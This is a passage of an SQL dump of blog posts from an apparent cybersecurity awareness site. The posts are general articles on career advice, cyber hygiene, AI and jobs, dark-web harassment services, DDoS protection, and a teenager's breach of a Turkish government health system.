Here are a few key takeaways to keep in mind:\n\n- **Time Commitment**: It may take 1–2 years of consistent learning and hands-on practice to feel ready for intermediate cybersecurity roles.\n- **Avoid Shortcuts**: Avoid programs or bootcamps promising quick results without explaining the depth of knowledge required.\n- **Ask Yourself the Hard Questions**:\n  - Would you hire yourself to secure a multi-million-dollar network after just a few weeks of training?\n  - Do you feel confident in your ability to identify, analyze, and address advanced threats?\n\nPatience and consistency are key. The professionals making six figures today spent years building their expertise, starting from the fundamentals and steadily progressing.\n\n## Beware of Low-Quality Training Programs\n\nUnfortunately, there are many low-quality cybersecurity programs designed purely to profit from the industry\'s demand for skilled professionals. Here’s how to spot red flags:\n\n- **Programs That Skip Basics**: If a program starts at advanced certifications like Security+ without covering IT and networking basics, it’s a warning sign.\n- **Get-Rich-Quick Claims**: Promises of earning six figures right away are unrealistic.\n- **Lack of Practical Training**: Theoretical knowledge alone isn\'t enough. Verify that the program offers labs or hands-on projects.\n\n## Cybersecurity Is a Career, Not a Shortcut\n\nEntering the world of cybersecurity is a rewarding choice for those ready to commit to learning, growth, and long-term development. The path is neither quick nor easy, but it’s worth the effort. 
Remember:\n\n- Start with the basics—system administration, networking, and fundamental IT concepts.\n- Take time to master each step before moving to the next level.', '', 'http://infoseclabs.io/uploads/1769824512492-685283470.jpg', 'Person learning cybersecurity fundamentals on a laptop', 1, 'published', '2026-01-31 16:13:00', '2026-01-31 04:56:00', 'Information Security', 'Start Cybersecurity Career with Bootcamp Insights', 'Explore the truth about cybersecurity bootcamps, mastering IT fundamentals, and realistic career paths.', 'Cybersecurity Bootcamp'),
(39, 'The Basics of Cyber Hygiene: How to Stay Safe Online', 'the-basics-of-cyber-hygiene-how-to-stay-safe-online', '# Understanding Cyber Hygiene: Safeguarding Your Digital World\n\nThe internet is an integral part of daily life, powering everything from personal interactions to professional operations. However, this connectivity also comes with an increased risk of cyber threats. This is where **cyber hygiene** steps in—a fundamental practice to keep digital environments secure. Whether you\'re an IT professional or a small business owner looking to safeguard your online presence, understanding the basics of cyber hygiene is the first step toward a more secure digital future.\n\n## What is Cyber Hygiene and Why Is It Important?\n\nAt its core, cyber hygiene refers to a set of routine practices and measures designed to maintain the health and security of your online systems. Think of it as digital cleanliness—just as washing your hands prevents illness, maintaining proper cyber hygiene helps protect your devices, data, and networks from harmful threats.\n\nWithout good cyber hygiene, both individuals and organizations become vulnerable to attacks that can lead to financial loss, data breaches, reputational damage, and even legal consequences. For small business owners, one successful cyberattack could put your operations at risk. For individuals, your personal information could be exploited in ways that result in identity theft or fraud.\n\n## Common Cyber Threats to Watch Out For\n\nTo understand the importance of cyber hygiene, it\'s crucial to recognize some of the most pervasive cyber threats. 
Here’s a quick overview:\n\n- **Viruses and Malware**: Malicious software designed to disrupt, damage, or gain unauthorized access to systems.\n- **Phishing Attacks**: Fraudulent attempts to obtain sensitive information (like login credentials) by masquerading as trustworthy entities.\n- **Ransomware**: A type of malware that encrypts your files and demands payment in exchange for access.\n- **Data Breaches**: Unauthorized access to confidential data, often leading to financial and reputational damage.\n- **Spyware and Keyloggers**: Programs covertly collecting personal information or monitoring users’ activities.\n\nThese threats can affect anyone and highlight the need to adopt proactive measures through solid cyber hygiene practices.\n\n## Essential Cyber Hygiene Practices\n\nNow that we understand the risks, let\'s explore some foundational practices to enhance your cybersecurity:\n\n### 1. Use Strong Passwords and Manage Them Wisely\n\n- Create complex passwords using a mix of upper- and lowercase letters, numbers, and special characters.\n- Avoid using the same password for multiple accounts.\n- Use a password manager to store and generate secure passwords.\n\n### 2. Keep Software and Systems Updated\n\nCybercriminals often exploit vulnerabilities in outdated software. By installing updates and patches as soon as they\'re available, you close the door to potential exploits. This includes updating your operating system, web browsers, and any apps you use.\n\n### 3. Practice Secure Browsing\n\n- Ensure that websites you visit use HTTPS encryption (look for a padlock symbol in the browser’s address bar).\n- Avoid clicking on suspicious links or advertisements.\n- Clear your browser’s cache and history regularly to remove unnecessary data that may pose security risks.\n\n### 4. Maintain Regular Data Backups\n\nCreate backups of critical data and store them in secure locations—both on physical devices and cloud storage. 
Frequent backups ensure that you can recover your information in the event of a cyberattack or hardware failure.\n\n### 5. Enable Multi-Factor Authentication (MFA)\n\nAdding an extra authentication step, like an SMS code or fingerprint scan, makes it far harder for attackers to access your accounts, even if they have your password.\n\n## Implementing Cyber Hygiene in Daily Life\n\nHere’s how you can incorporate these practices into your daily online activities:\n\n- **At Home**:\n  - Secure your home network with a strong password and avoid using default credentials for routers.\n  - Educate all members of your household about recognizing phishing emails and suspicious links.\n  - Regularly scan your devices for malware using trusted antivirus software.\n\n- **At Work**:\n  - Implement an organization-wide password policy that mandates strong and unique passwords.\n  - Set up secure access controls to limit who can access sensitive information.\n  - Raise awareness among employees about the risks of cyber threats through training sessions.\n\nFor website administrators and small businesses, taking advantage of cybersecurity tools—such as firewalls, intrusion detection systems, and encrypted communication—can offer an additional layer of protection.\n\n## The Role of Education and Awareness in Cybersecurity\n\nOne of the most critical components of cyber hygiene is awareness. Cybersecurity is not a “set it and forget it” solution. Threats are constantly evolving, which means individuals and organizations must stay informed to remain secure.\n\n- Regularly educate your team on the latest cyber threats and how to avoid them.\n- Follow reputable cybersecurity blogs or news platforms to be aware of emerging risks.\n- Leverage training programs to instill a culture of security-conscious behavior.\n\n## Staying Ahead of Cyber Threats\n\nThe cybersecurity landscape is always changing, with new threats and vulnerabilities emerging every day. 
Maintaining up-to-date knowledge and evolving your cyber hygiene practices remains essential.\n\nHere are a few tips for staying ahead:\n\n- Participate in cybersecurity webinars and events to learn about industry best practices.\n- Review and update your cybersecurity policies and tools annually.\n- Invest in advanced security solutions that can detect and mitigate threats in real time.\n\nCyber hygiene is more than just a buzzword; it’s a non-negotiable strategy for anyone navigating the digital landscape. Whether you’re an IT professional managing enterprise systems or an individual browsing the internet at home, these essential practices can significantly reduce your risk of falling victim to cyberattacks.', '', 'http://infoseclabs.io/uploads/1773420050138-748854934.jpg', 'Illustration of cyber hygiene practices for online safety', 1, 'published', '2026-03-13 13:36:00', '2026-03-13 19:40:55', 'Information Security', 'Cyber Hygiene: Stay Safe Online', 'Learn essential cyber hygiene practices to protect your digital life from threats like malware and phishing.', 'cyber hygiene'),
(40, 'Is AI Saving or Taking Jobs? Exploring the Impact on Work and Cybersecurity', 'is-ai-saving-or-taking-jobs-exploring-the-impact-on-work-and-cybersecurity', '# The Impact of AI on Employment: Creating and Eliminating Jobs\n\nThe world is constantly evolving with technological advancements, and artificial intelligence (AI) is at the forefront of this transformation. However, as AI integrates into various industries, it raises an essential question: Will AI take jobs or create new ones? The definitive answer is yes—to both. AI is simultaneously eliminating certain positions while opening doors to new opportunities. Let\'s explore this dual impact by looking at historical precedents and understanding how modern applications like cybersecurity are shaping the future of work.\n\n## A Historical Perspective on Technology and Jobs\n\n### Agricultural Revolution to Industrialization\n\nHistorically, technological advancements have disrupted traditional jobs while creating new avenues for employment. For instance:\n\n- **Agriculture**: Before agricultural automation, most people worked in fields. With the advent of machinery like tractors, fewer hands were needed for farming, allowing individuals to explore other kinds of work.\n\n- **Factories**: Industrialization shifted workers from farms to factories. While automation ultimately streamlined factory processes, it also paved the way for jobs in sectors like engineering and mechanics.\n\n### The Information Age\n\nThe introduction of computers and the internet revolutionized industries, creating entirely new fields:\n\n- Careers in IT, cybersecurity, and software development emerged.\n\n- Automation allowed businesses to process data faster, leading to improved productivity and higher quality of life for many employees.\n\n### The Era of AI\n\nToday, we are in the age of artificial intelligence. Similar to previous advancements, AI is eliminating certain positions while giving rise to new, innovative roles. 
Understanding its impact requires examining how AI integrates into specific industries.\n\n## How AI Impacts Cybersecurity Jobs\n\nCybersecurity provides an excellent case study of AI\'s potential and limitations. While AI is streamlining many security processes, it also introduces new challenges. Here\'s a closer look:\n\n### Benefits of AI in Cybersecurity\n\nAI is proving to be a valuable ally for cybersecurity professionals by handling tasks that are repetitive, complex, or highly data-intensive. Some of its key applications include:\n\n1. **Automating Repetitive Tasks**\n   - **Code Reviews**: AI tools can quickly scan through lines of code to detect vulnerabilities.\n   - **Penetration Testing**: Automation in pen testing reduces the time required to identify system vulnerabilities, allowing for preemptive actions.\n\n2. **Summarizing and Analyzing Cases**\n   - **Case Summarization**: AI can condense weeks of incident notes into an executive summary, saving hours of manual effort.\n   - **Threat Hunting**: AI-driven models can hypothesize potential attacks and identify indicators of compromise, enhancing proactive threat detection.\n\n3. **Interpreting Complex Logs**\n   - AI models, including Large Language Models (LLMs), can analyze intricate log entries, such as SQL commands, and interpret their meaning, saving analysts hours of investigation.\n\n4. **Anomaly Detection**\n   - AI excels at spotting outliers in system behavior, such as unusual privilege escalations or suspicious activity patterns. It helps cybersecurity teams focus on high-priority threats.\n\n5. **Recommending Actions**\n   - When threats are detected, AI can suggest mitigation strategies or remediations, helping teams develop a faster, more efficient response.\n\n### Limitations and Risks of AI in Cybersecurity\n\nAI\'s impact is not solely positive; it also brings challenges:\n\n1. 
**Cybercriminal Automation**\n   - Bad actors are leveraging AI to automate reconnaissance, vulnerability scanning, and even social engineering schemes, making threats more sophisticated.\n\n2. **Dependence on Human Oversight**\n   - While AI automates numerous tasks, humans are still essential. Analysts must ask the right questions, creatively use the tools, and filter out noise or irrelevant data.\n\n3. **Ethical Concerns**\n   - Decisions made by AI models can have built-in biases, requiring careful monitoring and auditing by cybersecurity professionals.\n\n## AI’s Broader Implications for Jobs\n\nThe adoption of AI across industries inevitably leads to job displacement in certain fields. Still, as history illustrates, technological disruptions often create opportunities in the following ways:\n\n- **Emerging Roles**: New careers, such as AI trainers, data analysts, and machine learning engineers, are emerging as businesses race to adopt and manage artificial intelligence tools.\n\n- **Skill Requirements**: Traditional roles are evolving. For example, jobs in marketing or content creation increasingly demand familiarity with AI-powered platforms.\n\n- **Human-Machine Collaboration**: Rather than entirely replacing humans, AI often augments their abilities, allowing professionals to work more efficiently by focusing on higher-level tasks.\n\n## Key Takeaways for Businesses and Professionals\n\n1. **Adaptability is Crucial**\n   - Professionals should focus on developing skills that align with emerging AI-related roles, including data literacy, cybersecurity expertise, and creative abilities.\n\n2. **Upskilling and Reskilling**\n   - Organizations should invest in upskilling their workforce to improve their employees\' competency in working alongside AI systems.\n\n3. 
**Leveraging AI for Competitive Advantage**\n   - Companies that effectively integrate AI into their operations can achieve greater efficiency, reduced costs, and a competitive edge in their industry.\n\n## Final Thoughts\n\nArtificial intelligence is neither fully saving nor completely taking jobs—it is reshaping the workforce. Like the shifts prompted by industrialization and the advent of computers, AI is eliminating certain roles but creating others that are more innovative and often more impactful.\n\nOne thing is clear: staying agile and adopting AI thoughtfully will be critical for organizations and professionals alike. Whether you\'re a business leader exploring AI\'s potential or a professional looking to future-proof your career, understanding AI\'s evolving role in industries like cybersecurity can provide valuable insights into the future of work.', '', 'http://infoseclabs.io/uploads/1773544174022-318815997.jpg', 'Illustration of AI integration in workplace and cybersecurity', 1, 'published', '2026-03-14 06:46:00', '2026-03-15 06:09:42', 'Information Security', 'AI\'s Dual Impact: Job Creation & Cybersecurity', 'Explore how AI is reshaping jobs and enhancing cybersecurity. Is it saving or taking jobs? Find out the dual impact here.', 'AI and jobs'),
(41, 'Cyberbullying and Blackmail: The Dark Web’s Disturbing Business Model', 'cyberbullying-and-blackmail-the-dark-webs-disturbing-business-model', '# The Dark Web: A Breeding Ground for Cyberbullying and Blackmail\n\nBehind the veil of anonymity, the dark web has evolved into a breeding ground for malicious activities that harm individuals and society at large. Emerging trends in cybercrime reveal an alarming shift—cyberbullying and blackmail have turned into lucrative business models, thriving on stolen personal data to fulfill goals of harassment, manipulation, and exploitation.\n\nThis blog dives deep into how platforms on the dark web, such as Illegal City, Jax, and Next City, facilitate these campaigns, who benefits from these unethical practices, and the devastating impact they have on society. More crucially, it highlights the necessity for stricter regulations, enforcement, and individual vigilance.\n\n## The Dark Web\'s Role in Cyberbullying\n\nCyberbullying is no longer confined to social media platforms; it has found a profitable, malicious home on the dark web. Panels like Illegal City, Jax, and Next City operate as organized hubs for cyberbullying campaigns. These platforms provide services that enable users to launch harassment attacks with impunity.\n\n### The Mechanics of Cyberbullying Panels\n\nHere’s how these panels work:\n\n- **Fake Reports and False Claims** – Users can create fabricated reports to tarnish a victim’s reputation.\n- **Harassment Messages** – A simple click allows users to send threatening or humiliating messages en masse, spreading fear and ruining lives.\n- **Blackmail Services** – These platforms use stolen personal data to blackmail individuals, often targeting sensitive details or relationships.\n\nFor instance, one such panel allows users to input a victim\'s phone number and send malicious messages to their entire contact list. 
Imagine the dread and helplessness a victim might feel when their private life is mercilessly invaded at this scale.\n\n### Real-Life Example\n\nA cyberbullying incident involving a professional in the legal sector highlights the dark reality of these platforms. The victim’s stolen data was used to fabricate damaging claims, triggering a cascade of humiliating messages to colleagues and family members. The emotional impact left the victim contemplating resignation, fearing irreparable career damage.\n\n## Who Benefits From These Platforms?\n\nWhile victims bear the brunt of these attacks, an unsettling reality has emerged—certain parties are exploiting cyberbullying platforms for personal gain.\n\n### Unethical Practices by Lawyers and Politicians\n\nSome lawyers leverage dark web panels to intimidate opposing parties or extract favorable outcomes in legal disputes. Meanwhile, unethical politicians use cyberbullying and blackmail to silence critics or manipulate adversaries, tarnishing reputations to secure wins.\n\n### Real-Life Case Study\n\nConsider the recent case of a rising political candidate who became the victim of coordinated cyberattacks executed through a dark web panel. Stolen emails and private messages were manipulated into false narratives, circulated widely through harassment campaigns. Although these actions were later exposed, the long-term damage to the victim’s mental health and career was irreversible.\n\n## The Economic Model Behind Cyberbullying\n\nHow do these platforms profit? Stolen personal data serves as the fuel that powers their illegal operations. The growing demand for custom harassment and blackmail schemes has turned these panels into thriving businesses.\n\n### The Role of Stolen Data\n\nPersonal data theft provides a continuous supply of ammunition for these schemes. 
Full names, addresses, phone numbers, and even sensitive financial details are sold in bulk to perpetrators seeking to target specific victims.\n\n### Profitability of Custom Campaigns\n\nThe dark web thrives on anonymity, enabling buyers and operators to transact without fear of exposure. Panel operators charge premium rates for personalized harassment campaigns, extending services into niche areas like reputation damage, fake reviews, or character assassination.\n\n### Real-Life Example\n\nExample statistics revealed that a single targeted harassment campaign on a dark web panel could generate upwards of $5,000 for the perpetrators. When combined with the volume of similar orders across these platforms, it’s evident why cyberbullying has become a disturbingly profitable business vertical.\n\n## The Ripple Effect on Society\n\nThe harm caused by these platforms extends far beyond their immediate victims. Families, communities, and organizations feel the ripple effects when cyberbullying escalates unchecked.\n\n### Mental Health Consequences\n\nVictims of these attacks often suffer from anxiety, depression, and PTSD. Studies have shown that cyberbullying can increase the risk of suicide, especially among vulnerable populations like teenagers and young adults.\n\n### Breakdown of Trust\n\nWhen stolen data is weaponized for harassment or blackmail, it erodes trust in digital platforms and institutions designed to keep information secure. These attacks also strain families and communities as they grapple with the emotional toll and cumulative trauma inflicted on victims.\n\n### Real-Life Example\n\nThe story of a high school teacher targeted by cyberbullying serves as a stark lesson. After her personal information was stolen and published online, her students and colleagues received falsified messages claiming misconduct. 
The situation culminated in her temporary removal from teaching duties, further straining relationships with her students and peers.\n\n## What Can Be Done?\n\nThe fight against cyberbullying and blackmail on the dark web requires a collective effort from individuals, policymakers, and cybersecurity experts.\n\n### Stricter Regulations and Penalties\n\nGovernments must impose stringent laws targeting the operators behind these panels. Punishments should extend to those who purchase services from such platforms to deter demand. Collaboration between international authorities is critical to dismantling the infrastructure these panels rely on.\n\n### Actions for Cybersecurity Experts\n\n- **Monitoring Threat Patterns** – AI algorithms can help trace suspicious activity early in the process to identify trends and shut down dark web operations.\n- **Public Awareness Campaigns** – Cybersecurity organizations play a vital role in educating people about the risks of data theft and how to safeguard personal information.\n\n### Recommendations for Individuals\n\n- Use strong, unique passwords for all online accounts to prevent data breaches.\n- Enable two-factor authentication to add an extra layer of security.\n- Regularly monitor your digital footprint to identify and address vulnerabilities.\n\n## We Must Act to Curb the Threat\n\nThe rise of cyberbullying and blackmail as a business model on the dark web is a sobering reality. It preys on stolen personal data, causing immense harm to individuals and communities while enriching unscrupulous operators. The emotional toll, mental health impacts, and societal breakdowns underscore the urgent need to address this issue.\n\nIt’s time for all of us—whether tech enthusiasts, cybersecurity experts, educators, or policymakers—to step up and take action. Advocate for stricter regulations. Educate yourself and others on cybersecurity best practices. 
Together, we can work toward a safer, more secure digital landscape for all.', '', 'http://infoseclabs.io/uploads/1773600451252-551323039.jpg', 'Illustration of dark web activities involving cyberbullying and blackmail', 1, 'published', '2025-03-05 21:53:00', '2026-03-15 21:47:53', 'Cyber Kids', 'Cyberbullying & Blackmail: Dark Web\'s Business', 'Explore how cyberbullying and blackmail thrive on the dark web, impacting lives and urging for stricter regulations.', 'Cyberbullying blackmail'),
(42, 'DDoS Attacks Explained: How to Protect Your Business Online', 'how-to-protect-your-website-from-ddos-attacks', '# Understanding and Defending Against DDoS Attacks\n\nWith the rise of internet dependency, the risk of cyberattacks continues to grow. Among the most disruptive are Distributed Denial of Service (DDoS) attacks, which can incapacitate even well-prepared websites. Whether you are an IT security expert, a small business owner, or a cybersecurity enthusiast, understanding and defending against DDoS attacks is critical to safeguarding your online assets.\n\n## What is a DDoS Attack, and How Can It Impact Websites?\n\nA Distributed Denial of Service (DDoS) attack is a malicious attempt to make a website or online service unavailable by overwhelming it with a flood of traffic. This traffic does not come from legitimate users but from compromised devices, often part of a botnet (a network of infected devices).\n\nThe impact of a successful DDoS attack can be devastating. For businesses, it may result in lost revenue, damaged reputation, and reduced customer trust. Non-profits and social organizations may lose critical access to their platforms during peak activity. Downtime caused by DDoS can also lead to long-term damage, including SEO penalties that further reduce the accessibility of the website.\n\n## Why Do DDoS Attacks Target Various Websites?\n\nDDoS attacks don\'t just target large corporations or high-profile organizations—they impact websites of all sizes and industries. 
Here’s why:\n\n- **Small Businesses**: Often targeted due to their typically weaker defenses compared to larger enterprises.\n- **Non-Profits**: May face attacks aimed at silencing their advocacy work or disrupting critical fundraising campaigns.\n- **Media and E-commerce Sites**: Attractive targets because downtime translates to significant revenue losses.\n\nUnderstanding this broad target range highlights the importance of proactive measures for every type of website.\n\n## Types of DDoS Attacks\n\nNot all DDoS attacks are created equal. Here’s a breakdown of the most common types:\n\n1. **Volumetric Attacks**: These are the most common type of DDoS attacks, aiming to overwhelm the bandwidth of your site by sending massive amounts of data traffic.\n\n2. **Protocol Attacks**: Designed to exploit weaknesses in network protocols, these attacks target servers and firewalls to exhaust their resources. Examples include SYN floods and Ping of Death attacks.\n\n3. **Application Layer Attacks**: Often harder to detect, these attacks focus on the application layer (e.g., HTTP, HTTPS). They simulate legitimate user activity, making them particularly damaging.\n\nUnderstanding these categories can help you identify and respond to attacks more effectively.\n\n## Signs That Your Website is Under a DDoS Attack\n\nDetecting a DDoS attack quickly is critical to reducing its impact. 
Here are indicators that your website might be under attack:\n\n- **Unusual Traffic Spikes**: A sudden and relentless flood of traffic, especially from suspicious or unknown IP addresses.\n\n- **Slow Server Performance**: If your website becomes noticeably slower or starts to time out, your server might be overwhelmed by illegitimate traffic.\n\n- **Frequent Crashes or Error Messages**: Repeated disruptions or \"Service Unavailable\" errors can signal that your systems are under strain.\n\nUsing real-time analytics tools, such as Google Analytics or server monitoring solutions, can help you monitor website performance and spot irregularities.\n\n## Best Practices for Protecting Your Website from DDoS Attacks\n\nPreventing DDoS attacks requires a combination of proactive measures and responsive strategies. Here’s what you can do:\n\n1. **Strengthen Network and Server Security**: \n   - Use firewalls and intrusion detection systems to identify and block malicious traffic.\n   - Regularly update your software to patch vulnerabilities that attackers may exploit.\n\n2. **Leverage DDoS Protection Services**: Providers like Cloudflare and Akamai specialize in offering services that detect and automatically mitigate DDoS threats before they reach your site.\n\n3. **Create a DDoS Response Plan**: Ensure your business has a documented plan with steps for identifying and addressing an attack. Train your team to execute this plan efficiently.\n\n4. **Use Load Balancers to Spread Traffic**: Distributing your website\'s traffic across multiple servers can reduce the strain caused by a DDoS attack.\n\n5. 
**Monitor for Abnormal Traffic**: Keep an eye on analytics to recognize and act on any unusual traffic patterns.\n\nBy implementing these strategies, you can significantly reduce the risk of DDoS-related downtime.\n\n## Case Studies of Websites that Defended Against DDoS Attacks\n\n- **GitHub’s Defense Against a Record-Breaking DDoS Attack**: GitHub successfully mitigated a 1.35 terabits per second (Tbps) DDoS attack in 2018 by relying on a robust web traffic filtering system and a dedicated DDoS mitigation service.\n\n- **Krebs on Security**: After facing a massive DDoS attack, the blog moved to a specialized protection service, which helped neutralize future threats.\n\nThese examples show that preparation and the use of the right tools can make all the difference.\n\n## Future Trends in DDoS Attacks and Evolving Defenses\n\nThe landscape of DDoS threats is continually evolving. Some emerging trends to watch out for include:\n\n- **IoT Device Exploitation**: Internet of Things (IoT) devices are increasingly used in botnets due to their often unpatched vulnerabilities.\n\n- **Amplified Volumetric Attacks**: Attackers are finding new techniques to multiply their traffic, making defenses harder.\n\n- **AI-Driven Mitigation**: The future of DDoS defense lies in AI and machine learning, which can analyze threats and adapt defenses in real-time to minimize the damage.\n\n## Be Proactive, Stay Protected\n\nKeeping your website safe from DDoS attacks isn’t just about using the right tools. It\'s about being proactive, staying informed, and continually adapting to new threats. 
By following best practices and leveraging advanced technologies, you can protect your online assets and maintain trust with your users.', '', 'http://infoseclabs.io/uploads/1773600729389-664744418.jpg', 'Website defense against DDoS attacks with cybersecurity shield', 1, 'published', '2025-02-15 13:26:00', '2026-03-15 21:52:13', 'Information Security', 'Protect Your Website from DDoS Attacks', 'Learn how to safeguard your site from DDoS attacks and protect against traffic overload, loss, and downtime.', 'DDoS protection'),
(43, 'The Young Hacker Who Breached a Government System: Lessons for Aspiring Cybersecurity Enthusiasts', 'the-young-hacker-who-breached-a-government-system-lessons-for-aspiring-cybersecurity-enthusiasts', '# Understanding the Impact of Cybersecurity Breaches\n\nWith technology at the core of our daily lives, we often overlook how small—almost invisible—vulnerabilities can lead to catastrophic security breaches. A particularly notable case highlights this reality vividly. A 15-year-old from Adana successfully breached Turkey’s government system, stealing data for 101 million citizens. This real-world incident serves as a wake-up call for aspiring cybersecurity professionals, underscoring the importance of understanding vulnerabilities and safeguarding systems against evolving threats.\n\nFor those interested in cybersecurity, this isn\'t just a cautionary tale—it’s an opportunity to learn how key measures like two-step verification and artificial intelligence systems can protect, or in this case, fail to protect digital infrastructures. Here’s a detailed breakdown of what happened and the valuable insights this incident offers.\n\n## The Adana Cyber Breach Demystified\n\nOn August 24, 2022, a 15-year-old from Adana gained unauthorized access to Turkey’s Public Health Management System (HSYS), a pivotal system for managing health records and initiatives. It was more than a conventional cyberattack; the breach resulted from exploiting a weak spot in the two-step verification system of the HSYS.\n\nTwo-step verification is designed to provide an additional layer of security, yet this system’s loophole allowed unauthorized access. The hacker didn’t stop there—using cutting-edge AI tools, he automated the extraction of sensitive personal data belonging to over 101 million citizens. 
While this demonstrates technical prowess, it also sets a dire precedent for the risks associated with the misuse of technology.\n\nFor cybersecurity learners, this incident highlights the importance of understanding and addressing vulnerabilities in even the most secure systems.\n\n## Hacking Techniques and Lessons for Learners\n\nThe methods employed in this breach reveal both the sophistication of modern cyberattacks and the ethical responsibility that accompanies learning such techniques. Here’s a deeper look at how the attack unfolded:\n\n### Exploiting Two-Step Verification\n\nTwo-step verification is a widely adopted practice requiring two forms of authentication before granting access. Despite being considered highly secure, the hacker identified a vulnerability in the HSYS that bypassed this critical layer effortlessly. Once inside, the real attack began.\n\n### Leveraging AI for Automation\n\nThe hacker deployed AI-powered tools to extract sensitive information on an unprecedented scale. Using machine learning algorithms, these tools automated data extraction and processing. For cybersecurity enthusiasts, this raises a critical question—how can cutting-edge AI be protected against misuse? Understanding how algorithms work and how attackers may exploit them is a fundamental skill for anyone entering this field.\n\n### Key Takeaway for Aspiring Cybersecurity Professionals\n\nThe challenge lies not just in fortifying systems but in adopting proactive approaches to uncover and patch vulnerabilities before they’re exploited. Aspiring cybersecurity learners should consider specialized training in system penetration testing, ethical hacking, and AI-driven security analysis. These skills are essential for protecting systems against increasingly sophisticated attacks.\n\n## Why This Breach Matters—Real-World Consequences\n\nThe ripple effects of this breach extend far beyond the stolen data itself. 
Understanding these consequences is critical for cybersecurity professionals working to foresee and mitigate the potential impacts of malicious attacks.\n\n- **Cyberbullying and Blackmail:** After the data was stolen, it became a weapon for ill intent, including blackmail and cyberbullying. Affected citizens faced emotional and financial harm, reinforcing the stakes of strong digital security.\n- **Organized Crime:** The stolen records facilitated organized crime, with cybercriminals using the breached data to fuel illegal activities. This demonstrates how a single cybersecurity lapse can feed into larger criminal networks.\n- **Global Implications:** Governments and enterprises worldwide are now questioning the integrity of their systems. This incident reveals that even industries considered secure—such as public health—are vulnerable to exploitation.\n\nFor learners and professionals in cybersecurity, incidents like this underscore the profound implications of weak security measures and the vital need to stay ahead of cybercriminal tactics.\n\n## Strengthening Cybersecurity for a Safer Future\n\nWhat can we do to avert similar breaches in the future? This incident provides a roadmap for cybersecurity learners to prioritize the following areas:\n\n1. **Vulnerability Assessment:** Conduct frequent system penetration tests to identify loopholes. Specialized knowledge in vulnerability scanning tools can be a game-changer.\n2. **AI-Driven Defense Mechanisms:** While AI technologies can be exploited, they can also protect systems. Aspiring cybersecurity professionals should explore AI-powered security tools that detect and mitigate threats in real time.\n3. **Rigorous Authentication Protocols:** Improve authentication systems to resist exploitation. Enhancing multi-factor authentication methods with biometrics or hardware keys can significantly reduce risks.\n4. **Continuous Learning:** The field of cybersecurity is fast-evolving. 
Courses in ethical hacking, AI security, and threat intelligence should be part of every learner’s roadmap.\n\nBy adopting these strategies and committing to continuous education, today’s learners can become tomorrow’s defenders of digital systems.\n\n## A Call to Aspiring Cybersecurity Professionals\n\nThe Adana cyber breach isn’t just an incident—it’s a pivotal lesson in the dynamic and demanding field of cybersecurity. It offers valuable insights for those passionate about securing digital infrastructures, fostering ethical AI development, and staying ahead of malicious actors.\n\nFor aspiring professionals, this case reiterates the importance of vigilance, innovation, and ethical responsibility. The global demand for skilled cybersecurity experts has never been greater. Whether you’re just starting or looking to deepen your expertise, now is the time to equip yourself with the skills and knowledge needed to tackle tomorrow’s threats.\n\n## Turning Lessons Into Action\n\nThe story of the Adana 15-year-old is a stark reminder that technology, while a powerful tool, is also a potential liability when left unchecked. For cybersecurity enthusiasts, this isn’t just a story of what went wrong—it’s a call to action to stay ahead of innovative attackers.\n\nTo those eager to make a positive impact, there’s no better time to start building your skills in cybersecurity. Take note of the lessons from this breach, learn from it, and play your part in creating a safer digital world for everyone.\n\n**Interested in learning more about cybersecurity? Start by exploring hands-on ethical hacking courses and vulnerability assessment tools today. 
The future of cybersecurity depends on bold thinkers like you.**', '', 'http://infoseclabs.io/uploads/1773601268603-974267264.jpg', 'Teenage hacker breaching government cybersecurity system', 1, 'published', '2025-02-10 15:10:00', '2026-03-15 22:03:53', 'History', 'Young Hacker Breaches Gov System: Cybersecurity Lessons', 'Discover how a 15-year-old hacked a government system and learn key cybersecurity lessons for aspiring professionals.', 'cybersecurity lessons');
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(44, 'The Dark Side of Gaming: How Virtual Worlds Are Fuels for Cybercrime', 'the-dark-side-of-gaming-how-virtual-worlds-are-fuels-for-cybercrime', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When the world turned to virtual entertainment for solace during the COVID-19 pandemic, another global phenomenon quietly unfolded—online gaming platforms became fertile ground for cybercriminal activity. With millions of new users joining virtual worlds and spending unprecedented amounts of time on these platforms, the gaming community became a microcosm of real cities, complete with thriving communities—yet also rife with risk. From breaches of personal data to bullying and criminal exploitation, gaming\'s darker side deserves attention now more than ever.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">A Turning Point for Online Gaming</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">2020 marked a colossal shift in the realm of online gaming. Locked in their homes due to pandemic restrictions, millions turned to virtual worlds like <b><strong class=\"font-bold\">Minecraft</strong></b>, <b><strong class=\"font-bold\">Roblox</strong></b>, and other multiplayer games as a way to connect, socialize, and escape. Initially, these immersive experiences offered a safe haven amid global uncertainties. But as platforms grew more popular, their unregulated nature and vast digital landscapes began to attract malicious actors.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Beyond casual gameplay, game servers evolved into dynamic ecosystems. Players assumed real-world roles such as police officers, traders, and landlords, mirroring the structure of bustling cities. 
